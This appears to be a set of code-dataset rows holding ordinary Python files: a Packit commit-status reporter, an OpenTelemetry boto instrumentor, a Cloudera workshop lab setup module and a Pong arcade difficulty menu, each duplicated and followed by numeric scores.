"| ------------- | ------------ |",
] + [f"| [{check}]({url}) | {state.name.upper()} |" for check in check_names]
table = "\n".join(comment_table_rows)
self.comment(table + f"\n### Description\n\n{description}")
def __add_commit_comment_with_status(
self, state: CommitStatus, description: str, check_name: str, url: str = ""
):
body = (
"\n".join(
[
f"- name: {check_name}",
f"- state: {state.name}",
f"- url: {url if url else 'not provided'}",
]
)
+ f"\n\n{description}"
)
self.project.commit_comment(
commit=self.commit_sha,
body=body,
)
def set_status(
self,
state: CommitStatus,
description: str,
check_name: str,
url: str = "",
):
# Required because Pagure API doesn't accept empty url.
if not url and isinstance(self.project, PagureProject):
url = "https://wiki.centos.org/Manuals/ReleaseNotes/CentOSStream"
logger.debug(
f"Setting status '{state.name}' for check '{check_name}': {description}"
)
try:
self.project_with_commit.set_commit_status(
self.commit_sha, state, url, description, check_name, trim=True
)
except gitlab.exceptions.GitlabCreateError as e:
# Ignoring Gitlab 'enqueue' error
# https://github.com/packit-service/packit-service/issues/741
if e.response_code != 400:
# 403: No permissions to set status, falling back to comment
# 404: Commit has not been found, e.g. used target project on GitLab
logger.debug(
f"Failed to set status for {self.commit_sha}, commenting on"
f" commit as a fallback: {str(e)}"
)
self.__add_commit_comment_with_status(
state, description, check_name, url
)
if e.response_code not in {400, 403, 404}:
raise
except github.GithubException:
self.__add_commit_comment_with_status(state, description, check_name, url)
# Also set the status of the pull-request for forges which don't do
# this automatically based on the flags on the last commit in the PR.
self.__set_pull_request_status(check_name, description, url, state)
def get_statuses(self):
self.project_with_commit.get_commit_statuses(commit=self.commit_sha)
def comment(self, body: str):
if self.pr_id:
self.project.get_pr(pr_id=self.pr_id).comment(body=body)
else:
self.project.commit_comment(commit=self.commit_sha, body=body) | packit_service/worker/reporting.py |
import hashlib
import logging
from typing import Optional, Union
import github
import gitlab
from ogr.abstract import CommitStatus, GitProject
from ogr.services.gitlab import GitlabProject
from ogr.services.pagure import PagureProject
logger = logging.getLogger(__name__)
class StatusReporter:
def __init__(
self,
project: GitProject,
commit_sha: str,
pr_id: Optional[int] = None,
):
logger.debug(
f"Status reporter will report for {project}, commit={commit_sha}, pr={pr_id}"
)
self.project: GitProject = project
self._project_with_commit: Optional[GitProject] = None
self.commit_sha: str = commit_sha
self.pr_id: Optional[int] = pr_id
@property
def project_with_commit(self) -> GitProject:
"""
Returns GitProject from which we can set commit status.
"""
if self._project_with_commit is None:
self._project_with_commit = (
self.project.get_pr(self.pr_id).source_project
if isinstance(self.project, GitlabProject) and self.pr_id is not None
else self.project
)
return self._project_with_commit
def report(
self,
state: CommitStatus,
description: str,
url: str = "",
check_names: Union[str, list, None] = None,
) -> None:
"""
set commit check status
:param state: state accepted by github
:param description: the long text
:param url: url to point to (logs usually)
:param check_names: those in bold
"""
if not check_names:
logger.warning("No checks to set status for.")
return
elif isinstance(check_names, str):
check_names = [check_names]
for check in check_names:
self.set_status(
state=state, description=description, check_name=check, url=url
)
def __set_pull_request_status(
self, check_name: str, description: str, url: str, state: CommitStatus
):
if self.pr_id is None:
return
pr = self.project.get_pr(self.pr_id)
if hasattr(pr, "set_flag") and pr.head_commit == self.commit_sha:
logger.debug("Setting the PR status (pagure only).")
pr.set_flag( # type: ignore
username=check_name,
comment=description,
url=url,
status=state,
# For Pagure: generate a custom uid from the check_name,
# so that we can update flags we set previously,
# instead of creating new ones.
uid=hashlib.md5(check_name.encode()).hexdigest(),
)
def report_status_by_comment(
self,
state: CommitStatus,
url: str,
check_names: Union[str, list, None],
description: str,
):
"""
Reporting build status with MR comment if no permission to the fork project
"""
if isinstance(check_names, str):
check_names = [check_names]
comment_table_rows = [
"| Job | Result |",
"| ------------- | ------------ |",
] + [f"| [{check}]({url}) | {state.name.upper()} |" for check in check_names]
table = "\n".join(comment_table_rows)
self.comment(table + f"\n### Description\n\n{description}")
def __add_commit_comment_with_status(
self, state: CommitStatus, description: str, check_name: str, url: str = ""
):
body = (
"\n".join(
[
f"- name: {check_name}",
f"- state: {state.name}",
f"- url: {url if url else 'not provided'}",
]
)
+ f"\n\n{description}"
)
self.project.commit_comment(
commit=self.commit_sha,
body=body,
)
def set_status(
self,
state: CommitStatus,
description: str,
check_name: str,
url: str = "",
):
# Required because Pagure API doesn't accept empty url.
if not url and isinstance(self.project, PagureProject):
url = "https://wiki.centos.org/Manuals/ReleaseNotes/CentOSStream"
logger.debug(
f"Setting status '{state.name}' for check '{check_name}': {description}"
)
try:
self.project_with_commit.set_commit_status(
self.commit_sha, state, url, description, check_name, trim=True
)
except gitlab.exceptions.GitlabCreateError as e:
# Ignoring Gitlab 'enqueue' error
# https://github.com/packit-service/packit-service/issues/741
if e.response_code != 400:
# 403: No permissions to set status, falling back to comment
# 404: Commit has not been found, e.g. used target project on GitLab
logger.debug(
f"Failed to set status for {self.commit_sha}, commenting on"
f" commit as a fallback: {str(e)}"
)
self.__add_commit_comment_with_status(
state, description, check_name, url
)
if e.response_code not in {400, 403, 404}:
raise
except github.GithubException:
self.__add_commit_comment_with_status(state, description, check_name, url)
# Also set the status of the pull-request for forges which don't do
# this automatically based on the flags on the last commit in the PR.
self.__set_pull_request_status(check_name, description, url, state)
def get_statuses(self):
self.project_with_commit.get_commit_statuses(commit=self.commit_sha)
def comment(self, body: str):
if self.pr_id:
self.project.get_pr(pr_id=self.pr_id).comment(body=body)
else:
self.project.commit_comment(commit=self.commit_sha, body=body) | 0.766774 | 0.135604 |
import logging
from inspect import currentframe
from boto.connection import AWSAuthConnection, AWSQueryConnection
from wrapt import wrap_function_wrapper
from opentelemetry.instrumentation.boto.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.sdk.trace import Resource
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import SpanKind, get_tracer
logger = logging.getLogger(__name__)
SERVICE_PARAMS_BLOCK_LIST = {"s3": ["params.Body"]}
def _get_instance_region_name(instance):
region = getattr(instance, "region", None)
if not region:
return None
if isinstance(region, str):
return region.split(":")[1]
return region.name
class BotoInstrumentor(BaseInstrumentor):
"""A instrumentor for Boto
See `BaseInstrumentor`
"""
def __init__(self):
super().__init__()
self._original_boto = None
def _instrument(self, **kwargs):
# AWSQueryConnection and AWSAuthConnection are two different classes
# called by different services for connection.
# For exemple EC2 uses AWSQueryConnection and S3 uses
# AWSAuthConnection
# pylint: disable=attribute-defined-outside-init
self._tracer = get_tracer(
__name__, __version__, kwargs.get("tracer_provider")
)
wrap_function_wrapper(
"boto.connection",
"AWSQueryConnection.make_request",
self._patched_query_request,
)
wrap_function_wrapper(
"boto.connection",
"AWSAuthConnection.make_request",
self._patched_auth_request,
)
def _uninstrument(self, **kwargs):
unwrap(AWSQueryConnection, "make_request")
unwrap(AWSAuthConnection, "make_request")
def _common_request( # pylint: disable=too-many-locals
self,
args_name,
traced_args,
operation_name,
original_func,
instance,
args,
kwargs,
):
endpoint_name = getattr(instance, "host").split(".")[0]
with self._tracer.start_as_current_span(
"{}.command".format(endpoint_name), kind=SpanKind.CONSUMER,
) as span:
span.set_attribute("endpoint", endpoint_name)
if args:
http_method = args[0]
span.set_attribute("http_method", http_method.lower())
# Original func returns a boto.connection.HTTPResponse object
result = original_func(*args, **kwargs)
if span.is_recording():
add_span_arg_tags(
span, endpoint_name, args, args_name, traced_args,
)
# Obtaining region name
region_name = _get_instance_region_name(instance)
meta = {
"aws.agent": "boto",
"aws.operation": operation_name,
}
if region_name:
meta["aws.region"] = region_name
for key, value in meta.items():
span.set_attribute(key, value)
span.set_attribute(
SpanAttributes.HTTP_STATUS_CODE, getattr(result, "status")
)
span.set_attribute(
SpanAttributes.HTTP_METHOD, getattr(result, "_method")
)
return result
def _patched_query_request(self, original_func, instance, args, kwargs):
return self._common_request(
("operation_name", "params", "path", "verb"),
["operation_name", "params", "path"],
args[0] if args else None,
original_func,
instance,
args,
kwargs,
)
def _patched_auth_request(self, original_func, instance, args, kwargs):
operation_name = None
frame = currentframe().f_back
operation_name = None
while frame:
if frame.f_code.co_name == "make_request":
operation_name = frame.f_back.f_code.co_name
break
frame = frame.f_back
return self._common_request(
(
"method",
"path",
"headers",
"data",
"host",
"auth_path",
"sender",
),
["path", "data", "host"],
operation_name,
original_func,
instance,
args,
kwargs,
)
def flatten_dict(dict_, sep=".", prefix=""):
"""
Returns a normalized dict of depth 1 with keys in order of embedding
"""
# NOTE: This should probably be in `opentelemetry.instrumentation.utils`.
# adapted from https://stackoverflow.com/a/19647596
return (
{
prefix + sep + k if prefix else k: v
for kk, vv in dict_.items()
for k, v in flatten_dict(vv, sep, kk).items()
}
if isinstance(dict_, dict)
else {prefix: dict_}
)
def add_span_arg_tags(span, aws_service, args, args_names, args_traced):
def truncate_arg_value(value, max_len=1024):
"""Truncate values which are bytes and greater than `max_len`.
Useful for parameters like "Body" in `put_object` operations.
"""
if isinstance(value, bytes) and len(value) > max_len:
return b"..."
return value
if not span.is_recording():
return
# Do not trace `Key Management Service` or `Secure Token Service` API calls
# over concerns of security leaks.
if aws_service not in {"kms", "sts"}:
tags = dict(
(name, value)
for (name, value) in zip(args_names, args)
if name in args_traced
)
tags = flatten_dict(tags)
for param_key, value in tags.items():
if param_key in SERVICE_PARAMS_BLOCK_LIST.get(aws_service, {}):
continue
span.set_attribute(param_key, truncate_arg_value(value)) | instrumentation/opentelemetry-instrumentation-boto/src/opentelemetry/instrumentation/boto/__init__.py | import logging
from inspect import currentframe
from boto.connection import AWSAuthConnection, AWSQueryConnection
from wrapt import wrap_function_wrapper
from opentelemetry.instrumentation.boto.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.sdk.trace import Resource
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import SpanKind, get_tracer
logger = logging.getLogger(__name__)
SERVICE_PARAMS_BLOCK_LIST = {"s3": ["params.Body"]}
def _get_instance_region_name(instance):
region = getattr(instance, "region", None)
if not region:
return None
if isinstance(region, str):
return region.split(":")[1]
return region.name
class BotoInstrumentor(BaseInstrumentor):
"""A instrumentor for Boto
See `BaseInstrumentor`
"""
def __init__(self):
super().__init__()
self._original_boto = None
def _instrument(self, **kwargs):
# AWSQueryConnection and AWSAuthConnection are two different classes
# called by different services for connection.
# For exemple EC2 uses AWSQueryConnection and S3 uses
# AWSAuthConnection
# pylint: disable=attribute-defined-outside-init
self._tracer = get_tracer(
__name__, __version__, kwargs.get("tracer_provider")
)
wrap_function_wrapper(
"boto.connection",
"AWSQueryConnection.make_request",
self._patched_query_request,
)
wrap_function_wrapper(
"boto.connection",
"AWSAuthConnection.make_request",
self._patched_auth_request,
)
def _uninstrument(self, **kwargs):
unwrap(AWSQueryConnection, "make_request")
unwrap(AWSAuthConnection, "make_request")
def _common_request( # pylint: disable=too-many-locals
self,
args_name,
traced_args,
operation_name,
original_func,
instance,
args,
kwargs,
):
endpoint_name = getattr(instance, "host").split(".")[0]
with self._tracer.start_as_current_span(
"{}.command".format(endpoint_name), kind=SpanKind.CONSUMER,
) as span:
span.set_attribute("endpoint", endpoint_name)
if args:
http_method = args[0]
span.set_attribute("http_method", http_method.lower())
# Original func returns a boto.connection.HTTPResponse object
result = original_func(*args, **kwargs)
if span.is_recording():
add_span_arg_tags(
span, endpoint_name, args, args_name, traced_args,
)
# Obtaining region name
region_name = _get_instance_region_name(instance)
meta = {
"aws.agent": "boto",
"aws.operation": operation_name,
}
if region_name:
meta["aws.region"] = region_name
for key, value in meta.items():
span.set_attribute(key, value)
span.set_attribute(
SpanAttributes.HTTP_STATUS_CODE, getattr(result, "status")
)
span.set_attribute(
SpanAttributes.HTTP_METHOD, getattr(result, "_method")
)
return result
def _patched_query_request(self, original_func, instance, args, kwargs):
return self._common_request(
("operation_name", "params", "path", "verb"),
["operation_name", "params", "path"],
args[0] if args else None,
original_func,
instance,
args,
kwargs,
)
def _patched_auth_request(self, original_func, instance, args, kwargs):
operation_name = None
frame = currentframe().f_back
operation_name = None
while frame:
if frame.f_code.co_name == "make_request":
operation_name = frame.f_back.f_code.co_name
break
frame = frame.f_back
return self._common_request(
(
"method",
"path",
"headers",
"data",
"host",
"auth_path",
"sender",
),
["path", "data", "host"],
operation_name,
original_func,
instance,
args,
kwargs,
)
def flatten_dict(dict_, sep=".", prefix=""):
"""
Returns a normalized dict of depth 1 with keys in order of embedding
"""
# NOTE: This should probably be in `opentelemetry.instrumentation.utils`.
# adapted from https://stackoverflow.com/a/19647596
return (
{
prefix + sep + k if prefix else k: v
for kk, vv in dict_.items()
for k, v in flatten_dict(vv, sep, kk).items()
}
if isinstance(dict_, dict)
else {prefix: dict_}
)
def add_span_arg_tags(span, aws_service, args, args_names, args_traced):
def truncate_arg_value(value, max_len=1024):
"""Truncate values which are bytes and greater than `max_len`.
Useful for parameters like "Body" in `put_object` operations.
"""
if isinstance(value, bytes) and len(value) > max_len:
return b"..."
return value
if not span.is_recording():
return
# Do not trace `Key Management Service` or `Secure Token Service` API calls
# over concerns of security leaks.
if aws_service not in {"kms", "sts"}:
tags = dict(
(name, value)
for (name, value) in zip(args_names, args)
if name in args_traced
)
tags = flatten_dict(tags)
for param_key, value in tags.items():
if param_key in SERVICE_PARAMS_BLOCK_LIST.get(aws_service, {}):
continue
span.set_attribute(param_key, truncate_arg_value(value)) | 0.69035 | 0.149531 |
import logging
import os
import re
import socket
import time
from abc import ABCMeta, abstractmethod
from contextlib import contextmanager
from datetime import datetime
from importlib import import_module
from inspect import getmembers
import requests
logging.basicConfig(level=logging.WARN)
LOG = logging.getLogger(__package__)
LOG.setLevel(logging.INFO)
# Global constants
LAB_METHOD_NAME_REGEX = r'lab([0-9]+)'
RUN_ID_ENV_VAR = 'RUN_ID'
THE_PWD_ENV_VAR = 'THE_PWD'
THE_PWD_FILE_NAME = 'the_pwd.txt'
ENABLE_TLS_FILE_NAME = '.enable-tls'
DEFAULT_TRUSTSTORE_PATH = '/opt/cloudera/security/x509/truststore.pem'
WORKSHOPS = {}
def _get_step_number(method_name):
match = re.match(LAB_METHOD_NAME_REGEX, method_name)
if match is None:
return None
return int(match.groups()[0])
def get_base_dir():
return os.path.dirname(__file__) if os.path.dirname(__file__) else '.'
def get_run_id():
if RUN_ID_ENV_VAR in os.environ:
rid = os.environ[RUN_ID_ENV_VAR]
else:
rid = str(int(time.time()))
LOG.debug('RUN_ID={}'.format(rid))
return rid
def _get_parent_dir(path):
return os.path.realpath(os.path.join(path, '..'))
def get_the_pwd():
if THE_PWD_ENV_VAR in os.environ:
return os.environ[THE_PWD_ENV_VAR]
return _get_the_pwd_from_file(get_base_dir())
def _get_the_pwd_from_file(path):
if path == '/':
raise RuntimeError('Cannot get The Pwd. Please set the THE_PWD env variable.')
file_path = os.path.join(path, THE_PWD_FILE_NAME)
if os.path.exists(file_path):
return open(file_path).read()
else:
return _get_the_pwd_from_file(_get_parent_dir(path))
def get_truststore_path():
return DEFAULT_TRUSTSTORE_PATH
def is_tls_enabled(path=None):
if path is None:
path = get_base_dir()
if path == '/':
return False
elif os.path.exists(os.path.join(path, ENABLE_TLS_FILE_NAME)):
return True
else:
return is_tls_enabled(_get_parent_dir(path))
def get_hostname():
return socket.gethostname()
def get_url_scheme():
return 'https' if is_tls_enabled() else 'http'
def api_request(method, url, expected_code=requests.codes.ok, auth=None, **kwargs):
truststore = get_truststore_path() if is_tls_enabled() else None
LOG.debug('Request: method: %s, url: %s, auth: %s, verify: %s, kwargs: %s',
method, url, 'yes' if auth else 'no', truststore, kwargs)
resp = requests.request(method, url, auth=auth, verify=truststore, **kwargs)
if resp.status_code != expected_code:
raise RuntimeError('Request to URL %s returned code %s (expected was %s), Response: %s' % (
resp.url, resp.status_code, expected_code, resp.text))
return resp
class AbstractWorkshopMeta(ABCMeta):
def __init__(cls, name, bases, dct):
type.__init__(cls, name, bases, dct)
if cls.workshop_id():
WORKSHOPS[cls.workshop_id()] = cls
class AbstractWorkshop(metaclass=AbstractWorkshopMeta):
def __init__(self, run_id=None, context=None):
class _Context(object):
pass
self.context = context or _Context()
self.run_id = run_id if run_id is not None else get_run_id()
@classmethod
@abstractmethod
def workshop_id(cls):
"""Return a short string to identify the workshop."""
pass
@classmethod
@abstractmethod
def prereqs(cls):
"""
Return a list of prereqs for this workshop. The list can contain either:
- Strings identifying the name of other workshops that need to be setup before this one does. In
this case all the labs of the specified workshop will be setup.
- Tuples (String, Integer), where the String specifies the name of the workshop and Integer the number
of the last lab of that workshop to be executed/setup.
"""
pass
def before_setup(self):
pass
def after_setup(self):
pass
@abstractmethod
def teardown(self):
pass
def _setup_prereqs(self):
global WORKSHOPS
for prereq in self.prereqs():
if isinstance(prereq, str):
workshop = prereq
lab = 99
else:
workshop, lab = prereq
LOG.info('Executing prereqs setup: Workshop {}, Lab < {}'.format(workshop, lab))
WORKSHOPS[workshop](self.run_id, self.context).execute_setup(lab)
def _teardown_prereqs(self):
global WORKSHOPS
for prereq in self.prereqs():
if isinstance(prereq, str):
workshop = prereq
else:
workshop, _ = prereq
LOG.info('Executing prereqs teardown: Workshop {}'.format(workshop))
WORKSHOPS[workshop](self.run_id, self.context).execute_teardown()
def execute_setup(self, target_lab=99):
self._setup_prereqs()
self.before_setup()
lab_setup_functions = [(n, f, _get_step_number(n)) for n, f in
getmembers(self.__class__) if _get_step_number(n) is not None]
LOG.debug("Found Lab Setup Functions: %s", str(map(lambda x: x[2], lab_setup_functions)))
for func_name, func, lab_number in lab_setup_functions:
if lab_number < target_lab:
LOG.info("Executing {}::{}".format(self.workshop_id(), func_name))
func(self)
else:
LOG.debug("[{0}] is numbered higher than target [lab{1}], skipping".format(func_name, target_lab))
self.after_setup()
return self.context
def execute_teardown(self):
self.teardown()
self._teardown_prereqs()
def get_artifacts_dir(self):
return os.path.join(os.path.dirname(__file__), 'artifacts', self.workshop_id())
def _load_workshops():
base_dir = get_base_dir()
for f in os.listdir(base_dir):
if f.startswith('workshop_') and os.path.isfile(os.path.join(base_dir, f)):
f = '.' + f.replace('.py', '')
import_module(f, package=__package__)
def global_setup(target_workshop='base', target_lab=99, run_id=None):
_load_workshops()
if target_workshop in WORKSHOPS:
LOG.info('Executing setup for Lab {} in Workshop {}'.format(target_workshop, target_lab))
WORKSHOPS[target_workshop](run_id).execute_setup(target_lab)
else:
raise RuntimeError("Workshop [{}] not found. Known workshops are: {}".format(target_workshop, WORKSHOPS))
LOG.info('Global setup completed successfully!')
def global_teardown(target_workshop='base', run_id=None):
_load_workshops()
if target_workshop is not None:
LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
WORKSHOPS[target_workshop](run_id).execute_teardown()
else:
for target_workshop in WORKSHOPS:
LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
WORKSHOPS[target_workshop](run_id).execute_teardown()
LOG.info('Global teardown completed successfully!')
@contextmanager
def exception_context(obj):
try:
yield
except:
print('%s - Exception context: %s' % (datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), obj))
raise
def retry_test(max_retries=0, wait_time_secs=0):
def wrap(f):
def wrapped_f(*args, **kwargs):
retries = 0
while True:
try:
f(*args, **kwargs)
break
except Exception:
if retries >= max_retries:
raise
else:
retries += 1
time.sleep(wait_time_secs)
print('%s - Retry #%d' % (datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), retries))
return wrapped_f
return wrap | setup/terraform/resources/labs/__init__.py | import logging
import os
import re
import socket
import time
from abc import ABCMeta, abstractmethod
from contextlib import contextmanager
from datetime import datetime
from importlib import import_module
from inspect import getmembers
import requests
logging.basicConfig(level=logging.WARN)
LOG = logging.getLogger(__package__)
LOG.setLevel(logging.INFO)
# Global constants
LAB_METHOD_NAME_REGEX = r'lab([0-9]+)'
RUN_ID_ENV_VAR = 'RUN_ID'
THE_PWD_ENV_VAR = 'THE_PWD'
THE_PWD_FILE_NAME = 'the_pwd.txt'
ENABLE_TLS_FILE_NAME = '.enable-tls'
DEFAULT_TRUSTSTORE_PATH = '/opt/cloudera/security/x509/truststore.pem'
WORKSHOPS = {}
def _get_step_number(method_name):
match = re.match(LAB_METHOD_NAME_REGEX, method_name)
if match is None:
return None
return int(match.groups()[0])
def get_base_dir():
return os.path.dirname(__file__) if os.path.dirname(__file__) else '.'
def get_run_id():
if RUN_ID_ENV_VAR in os.environ:
rid = os.environ[RUN_ID_ENV_VAR]
else:
rid = str(int(time.time()))
LOG.debug('RUN_ID={}'.format(rid))
return rid
def _get_parent_dir(path):
return os.path.realpath(os.path.join(path, '..'))
def get_the_pwd():
if THE_PWD_ENV_VAR in os.environ:
return os.environ[THE_PWD_ENV_VAR]
return _get_the_pwd_from_file(get_base_dir())
def _get_the_pwd_from_file(path):
if path == '/':
raise RuntimeError('Cannot get The Pwd. Please set the THE_PWD env variable.')
file_path = os.path.join(path, THE_PWD_FILE_NAME)
if os.path.exists(file_path):
return open(file_path).read()
else:
return _get_the_pwd_from_file(_get_parent_dir(path))
def get_truststore_path():
return DEFAULT_TRUSTSTORE_PATH
def is_tls_enabled(path=None):
if path is None:
path = get_base_dir()
if path == '/':
return False
elif os.path.exists(os.path.join(path, ENABLE_TLS_FILE_NAME)):
return True
else:
return is_tls_enabled(_get_parent_dir(path))
def get_hostname():
return socket.gethostname()
def get_url_scheme():
return 'https' if is_tls_enabled() else 'http'
def api_request(method, url, expected_code=requests.codes.ok, auth=None, **kwargs):
truststore = get_truststore_path() if is_tls_enabled() else None
LOG.debug('Request: method: %s, url: %s, auth: %s, verify: %s, kwargs: %s',
method, url, 'yes' if auth else 'no', truststore, kwargs)
resp = requests.request(method, url, auth=auth, verify=truststore, **kwargs)
if resp.status_code != expected_code:
raise RuntimeError('Request to URL %s returned code %s (expected was %s), Response: %s' % (
resp.url, resp.status_code, expected_code, resp.text))
return resp
class AbstractWorkshopMeta(ABCMeta):
def __init__(cls, name, bases, dct):
type.__init__(cls, name, bases, dct)
if cls.workshop_id():
WORKSHOPS[cls.workshop_id()] = cls
class AbstractWorkshop(metaclass=AbstractWorkshopMeta):
def __init__(self, run_id=None, context=None):
class _Context(object):
pass
self.context = context or _Context()
self.run_id = run_id if run_id is not None else get_run_id()
@classmethod
@abstractmethod
def workshop_id(cls):
"""Return a short string to identify the workshop."""
pass
@classmethod
@abstractmethod
def prereqs(cls):
"""
Return a list of prereqs for this workshop. The list can contain either:
- Strings identifying the name of other workshops that need to be setup before this one does. In
this case all the labs of the specified workshop will be setup.
- Tuples (String, Integer), where the String specifies the name of the workshop and Integer the number
of the last lab of that workshop to be executed/setup.
"""
pass
def before_setup(self):
pass
def after_setup(self):
pass
@abstractmethod
def teardown(self):
pass
def _setup_prereqs(self):
global WORKSHOPS
for prereq in self.prereqs():
if isinstance(prereq, str):
workshop = prereq
lab = 99
else:
workshop, lab = prereq
LOG.info('Executing prereqs setup: Workshop {}, Lab < {}'.format(workshop, lab))
WORKSHOPS[workshop](self.run_id, self.context).execute_setup(lab)
def _teardown_prereqs(self):
global WORKSHOPS
for prereq in self.prereqs():
if isinstance(prereq, str):
workshop = prereq
else:
workshop, _ = prereq
LOG.info('Executing prereqs teardown: Workshop {}'.format(workshop))
WORKSHOPS[workshop](self.run_id, self.context).execute_teardown()
def execute_setup(self, target_lab=99):
self._setup_prereqs()
self.before_setup()
lab_setup_functions = [(n, f, _get_step_number(n)) for n, f in
getmembers(self.__class__) if _get_step_number(n) is not None]
LOG.debug("Found Lab Setup Functions: %s", str(map(lambda x: x[2], lab_setup_functions)))
for func_name, func, lab_number in lab_setup_functions:
if lab_number < target_lab:
LOG.info("Executing {}::{}".format(self.workshop_id(), func_name))
func(self)
else:
LOG.debug("[{0}] is numbered higher than target [lab{1}], skipping".format(func_name, target_lab))
self.after_setup()
return self.context
def execute_teardown(self):
self.teardown()
self._teardown_prereqs()
def get_artifacts_dir(self):
return os.path.join(os.path.dirname(__file__), 'artifacts', self.workshop_id())
def _load_workshops():
base_dir = get_base_dir()
for f in os.listdir(base_dir):
if f.startswith('workshop_') and os.path.isfile(os.path.join(base_dir, f)):
f = '.' + f.replace('.py', '')
import_module(f, package=__package__)
def global_setup(target_workshop='base', target_lab=99, run_id=None):
_load_workshops()
if target_workshop in WORKSHOPS:
LOG.info('Executing setup for Lab {} in Workshop {}'.format(target_workshop, target_lab))
WORKSHOPS[target_workshop](run_id).execute_setup(target_lab)
else:
raise RuntimeError("Workshop [{}] not found. Known workshops are: {}".format(target_workshop, WORKSHOPS))
LOG.info('Global setup completed successfully!')
def global_teardown(target_workshop='base', run_id=None):
_load_workshops()
if target_workshop is not None:
LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
WORKSHOPS[target_workshop](run_id).execute_teardown()
else:
for target_workshop in WORKSHOPS:
LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
WORKSHOPS[target_workshop](run_id).execute_teardown()
LOG.info('Global teardown completed successfully!')
@contextmanager
def exception_context(obj):
try:
yield
except:
print('%s - Exception context: %s' % (datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), obj))
raise
def retry_test(max_retries=0, wait_time_secs=0):
def wrap(f):
def wrapped_f(*args, **kwargs):
retries = 0
while True:
try:
f(*args, **kwargs)
break
except Exception:
if retries >= max_retries:
raise
else:
retries += 1
time.sleep(wait_time_secs)
print('%s - Retry #%d' % (datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), retries))
return wrapped_f
return wrap | 0.415492 | 0.054575 |
from ...UI.Base import Document
from ...UI.Elements import div,img,label,radio
from ...Core.DataTypes.UI import EventListener
from ...UI.CustomElements import AspectRatioPreservedContainer
class CreateGame(Document):
Name = "Pong/Arcade/CreateGame"
StyleSheet = "Styles/Arcade/CreateGame.json"
ResourceKey = "Arcade"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# region Background
container = AspectRatioPreservedContainer() # The container
self.Children += container # Add child
background = img(self.Window.Resources.Images.Background,classes = ".background") # The background
container.Children += background # Add child
# endregion
# title
title = label(text="Arcade", classes = ".title")
background.Children += title
# region goHomeButton
goHomeButton = img(self.Window.Resources.Images.Home, classes = ".goHome .imgButton")
goHomeButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("MainMenu"))
background.Children += goHomeButton
# endregion
self.SelectDifficultyBox = div(classes = ".selectionBox")
background.Children += self.SelectDifficultyBox
self.PopulateDifficultyBox()
def PopulateDifficultyBox(self):
mintitle = label(classes = ".miniTitle", text = "Select Difficulty")
self.SelectDifficultyBox.Children += mintitle
self.OptionsRadio = radio(classes = ".optionsRadio")
self.SelectDifficultyBox.Children += self.OptionsRadio
self.OptionsRadio.Children += label(text = "Beginner",classes = ".option .lvl1")
self.OptionsRadio.Children += label(text = "Novice",classes = ".option .lvl2")
self.OptionsRadio.Children += label(text = "Amateur",classes = ".option .lvl3")
self.OptionsRadio.Children += label(text = "Expert",classes = ".option .lvl4")
self.OptionsRadio.Children += label(text = "Impossible",classes = ".option .lvl5")
self.OptionsRadio.SelectedElement = self.OptionsRadio.Children[0]
startButton = label(text="Start", classes = ".startButton")
startButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("PlayGame"))
self.SelectDifficultyBox.Children += startButton
def NavigateTo(self, dest):
if dest == "MainMenu":
from ..MainMenu import MainMenu
self.Window.ChangeDocumentTo(MainMenu)
elif dest == "PlayGame":
self.SetSettings()
from .PlayGame import PlayGame
self.Window.ChangeDocumentTo(PlayGame)
def SetSettings(self):
difficulty = self.OptionsRadio.SelectedElement.Text
if difficulty == "Beginner":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Beginner'
elif difficulty == "Novice":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Novice'
elif difficulty == "Amateur":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 1,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Amateur'
elif difficulty == "Expert":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 30,
"DifficultySlope" : 0.1,
"BallCount" : 2,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Expert'
elif difficulty == "Impossible":
self.Window.Resources.Storage.Arcade['GameSettings'] = {
"Difficulty" : 40,
"DifficultySlope" : 0.01,
"BallCount" : 5,
"Duece" : False,
"WinCondition" : 0,
}
self.Window.Resources.Storage.Arcade['Difficulty'] = 'Impossible' | Client/App/Views/Arcade/CreateGame.py | from ...UI.Base import Document
from ...UI.Elements import div,img,label,radio
from ...Core.DataTypes.UI import EventListener
from ...UI.CustomElements import AspectRatioPreservedContainer
class CreateGame(Document):
Name = "Pong/Arcade/CreateGame"
StyleSheet = "Styles/Arcade/CreateGame.json"
ResourceKey = "Arcade"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# region Background
container = AspectRatioPreservedContainer() # The container
self.Children += container # Add child
background = img(self.Window.Resources.Images.Background,classes = ".background") # The background
container.Children += background # Add child
# endregion
# title
title = label(text="Arcade", classes = ".title")
background.Children += title
# region goHomeButton
goHomeButton = img(self.Window.Resources.Images.Home, classes = ".goHome .imgButton")
goHomeButton.EventListeners += EventListener("<Button-1>", lambda e:self.NavigateTo("MainMenu"))
background.Children += goHomeButton
# endregion
self.SelectDifficultyBox = div(classes = ".selectionBox")
